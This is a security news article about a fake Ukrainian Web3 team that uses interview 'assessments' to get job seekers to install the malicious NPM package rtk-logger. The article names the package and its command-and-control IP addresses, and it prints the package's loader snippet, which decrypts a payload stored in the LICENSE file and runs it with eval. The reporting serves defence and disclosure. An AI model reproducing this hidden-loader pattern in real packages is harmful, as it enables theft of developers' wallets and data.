A sophisticated cybercriminal operation disguised as a Ukrainian Web3 development team has been targeting job seekers through weaponized NPM packages, security researchers warn.<\/p>\n
The attack leverages fake interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser data, and sensitive personal information.<\/p>\n
The campaign centers around a seemingly legitimate GitHub repository<\/a> called \u201cEvaCodes-Community\/UltraX,\u201d which attackers present to prospective employees during first-round interviews.<\/p>\n Victims are instructed to clone and run the repository locally as part of a technical assessment. However, the project contains a malicious NPM dependency designed to harvest sensitive data from the target\u2019s system.<\/p>\n On August 9, 2025, a community member approached SlowMist researchers after becoming suspicious of the repository\u2019s contents during an interview process.<\/p>\n The security team\u2019s subsequent analysis revealed the presence of a backdoor embedded within the project\u2019s dependencies, confirming the malicious nature of what appeared to be a standard Web3 development repository.<\/p>\n SlowMist analysts identified<\/a> that the attack initially used the NPM package \u201credux-ace@1.0.3,\u201d which was later replaced with \u201crtk-logger@1.11.5\u201d after the original package was removed by NPM\u2019s security team.<\/p>\n The newer package, published on August 8, 2025, contains heavily obfuscated<\/a> code designed to evade detection while maintaining the same malicious functionality.<\/p>\n The threat extends beyond individual victims, as the researchers discovered that two additional GitHub accounts had forked the malicious repository, suggesting a broader campaign targeting multiple potential victims across the Web3 job market.<\/p>\n The malware\u2019s infection vector relies on social engineering rather than technical exploitation, making it particularly dangerous for job seekers in the competitive Web3 space.<\/p>\n Once the victim clones the repository and executes \u201cnpm install,\u201d the malicious rtk-logger package automatically triggers its payload through a sophisticated multi-stage process.<\/p>\n The package\u2019s core malicious code resides in \u201c\/rtk-logger\/lib\/utils\/smtp-connection\/index.js,\u201d which uses AES-256-CBC decryption to unlock obfuscated payloads stored in the LICENSE file.<\/p>\n The decryption process employs hardcoded keys and initialization vectors, allowing the malware to execute without additional network communication during initial deployment.<\/p>\n After successful decryption, the malware<\/a> establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling remote access and data exfiltration capabilities while maintaining persistence through various system-level modifications.<\/p>\n The post Ukrainian Web3team Weaponizing NPM Package to Attack Job Seekers and Steal Sensitive Data<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEidvFH_okmiC_9S0fnGLH0M7oqWJ02_cVT6eAtluFjG0UoMi-MN0rzouuzqmaxrzg_Cd-znatxP5KBEFS6cvR76jwtidEn3x2QcbiAegztnDYrszH0zl3reYL5R07Qxq39hoDMHd4w4EuHJycibAE5679iZvDftZWvGcjdo_avYQv68Xc3gARRe-kC5oyA\/s16000\/rtk-logger%401.11.5%2520package%2520%28Source%2520-%2520Medium%29.webp?ssl=1\")
Infection Mechanism and Code Execution<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiWbR1nSwQPy1dLdWRNI8-2gz4zbc6-vKX2NziXrU4EIXHJV_B8InsAgE2eSxgelEw7clFvB28xoEnZGfkXE3mRdAE2oZR3vTh-EeEXk3PvCEo2hE9vWnydHvhtrunFZPdGO03N4fm3c_5eGUOu8FEE90JBKhc1rFoUeEBZOVcSS3C0qL61m__Uuh3Nc0g\/s16000\/malicious%2520code%2520location%2520%28Source%2520-%2520Medium%29.webp?ssl=1\")
const fs = require('fs');\nconst path = require('path');\nconst parseLib = require('.\/parse')\nconst filePath = path.join(__dirname, 'LICENSE');\nfs.readFile(filePath, 'utf8', (_, data) => {\n try {\n eval(parseLib(data))\n } catch (err) {\n console.error('Error during parsing\/eval:', err);\n }\n})<\/code><\/pre>\nBoost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n